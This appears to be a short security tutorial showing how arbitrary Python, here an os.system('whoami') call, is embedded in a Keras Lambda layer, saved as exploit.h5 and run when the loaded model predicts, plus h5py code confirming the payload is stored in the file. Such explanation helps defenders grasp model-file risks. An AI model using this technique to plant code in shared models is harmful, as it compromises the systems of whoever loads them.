Creating Malicious TensorFlow Models
TensorFlow (Keras) models can be created with malicious code embedded in them, for example by wrapping arbitrary Python in a Lambda layer:
import tensorflow as tf

def exploit(x):
    # Payload: runs an arbitrary shell command whenever the layer is evaluated
    import os
    cmd = "whoami"
    os.system(cmd)
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
# The Lambda layer carries the Python function, so it is serialized along with the model
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
If someone loads this model and runs it as follows:
import tensorflow as tf

model = tf.keras.models.load_model("exploit.h5")
# The embedded function runs as part of the forward pass
model.predict(tf.zeros((1, 64)))
The whoami command will be executed on the loading system as soon as the model performs a forward pass. This is a trivial example, but any Python code can be embedded in the same way.
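To confirm that the payload travels inside the file itself rather than in the loading script, the saved HDF5 file can be inspected directly. The following is a minimal sketch, assuming the h5py package is installed; it only reads the model_config attribute that Keras writes into exploit.h5.

import h5py

# Keras stores the full architecture, including the serialized Lambda function,
# in the model_config attribute of the HDF5 file.
with h5py.File("exploit.h5", "r") as f:
    config = f.attrs["model_config"]
    print("Lambda" in str(config))  # True: the malicious layer is embedded in the file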